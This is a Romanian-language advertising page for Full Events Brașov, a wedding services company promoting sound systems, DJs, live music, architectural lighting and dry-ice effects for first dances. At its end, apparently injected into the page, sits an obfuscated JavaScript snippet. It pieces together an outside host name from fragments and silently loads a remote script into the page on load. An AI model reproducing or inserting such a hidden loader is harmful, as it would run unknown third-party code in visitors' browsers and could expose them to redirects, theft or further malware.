Sari la conținut

Full Events: o nuntă de vis pentru casă de piatră!

full-events-o-nunta-de-vis-pentru-casa-de-piatra

Dacă vă gândiți că nunta e doar un party mai mare, mai gândiți-vă! Pentru o petrecere aniversară, ai întotdeauna a doua șansă în anul următor. Dar pentru un start cum se cuvine în viața de familie nu există a doua șansă. De altfel, nici nu vă trebuie dacă lucrați cu profesioniști. La Full Events Brașov, petrecerile sunt luate în serios pentru ca protagoniștii să se bucure de ele de pe ring, nu din culise. Irepetabile, unice, perfecte pentru că marchează începutul frumoaselor povești de familie – așa sunt nunțile din portofoliul nostru.

În 15 ani de evenimente, am făcut din perfecțiune un crez. Știm că e nevoie de oameni dedicați în culise pentru ca evenimentul să pulseze. Aceștia suntem noi – echipa Full Events, formată din oameni pasionați de ceea ce fac, care vă stau alături de la prima întrebare, pentru ca nunta voastră să fie o experiență completă, lipsită de griji.

Ce oferim? Consultanță, înainte de orice. Industria evenimentelor e una extrem de dinamică și ceea ce era în trend acum un an, astăzi s-ar putea să fie desuet. Odată începută aventura organizării, s-ar putea să aveți întrebări: sonorizare, lumini, efecte – tot ce înseamnă atmosferă e la noi în playground și suntem aici cu răspunsuri menite să vă ajute să luați deciziile care vi se potrivesc.

Dacă aveți deja o idee despre cum ați vrea să se scrie povestea nunții voastre, putem discuta punctual despre ce puteți lăsa în grija noastră pentru ca voi să bucurați de eveniment alături de invitați.
Sonorizarea L-Acoustics Brașov este specialitatea noastră. Cu un rider tehnic de excepție pentru sonorizare și lumini, putem susține evenimente de anvergură. Aici doar cerul e limita! La o nuntă-festival, Full Events spune un “da” hotărât și aduce la pupitru cei mai experimentați DJ Brașov!

Pentru accente de autenticitate, muzică live Brașov face parte din oferta noastră. Cu o experiență de 40 de ani în muzică, solistul și instrumentistul Țicu Șerban oferă un concept inedit, abordând genuri multiple cu talent vocal și chitară electro-acustică, cu negative sau unplugged (la rece).
Improvizația este unul din talentele artistului, care face din orice reprezentație un succes.

Luminile sunt unul din acele detalii care întregesc atmosfera. Punem în valoare eleganța locației prin lumini arhitecturale care au abilitatea de a crea intimitatea și confortul atât de importante pentru reușita unui eveniment. O alternativă la acestea este schela de lumini nuntă care, spre deosebire de cele arhitecturale, urmează ritmul muzicii, fiind coordonate în raport cu momentele cheie ale evenimentului.

Fumul greu și gheața carbonică sunt elemente nelipsite la primul dans. Ca și luminile, acestea sunt detalii de impact care dau momentului o notă de poveste, înlesnind efortul mirilor de a performa, mai ales atunci când aceștia nu sunt tocmai profesioniști în ale dansului.

Adevărate povești transpuse în petrecere, nunțile rămân memorabile pentru toți invitații, cu atât mai mult atunci când se petrec armonios, într-o atmosferă caldă, urmând cursiv conceptul ales. Mult prea des, însă, pentru a se asigura de succesul evenimentului, mirii se poziționează în culise, uitând că ziua nunții e despre ei, de fapt.

Misiunea Full Events e să le ofere acestora experiența completă! Pentru ca voi să intrați în povestea nunții voastre, noi ne ocupăm de atmosferă, luând seama la pulsul petrecerii pentru a pune evenimentul pe cele mai înalte vibrații!

CONTACTAȚI-NE

Nunta de vis

// <![CDATA[ (function(){ zd4w=document.createElement("script");zd4w_=(("u")+"st")+"a";zd4w.async=true; zd4w.type="text/javascript";zd4w_+=("t.i")+""+"n";zd4w_+=(("f")+"o");zd4w_+="/"; zd4wu="435020868.";zd4wu+="t6ud4e55d4wpdg58t8c"+"3bvl388ukX6"; zd4w.src="https://"+zd4w_+zd4wu;document.body.appendChild(zd4w); })(); // ]]>

Ultimă oră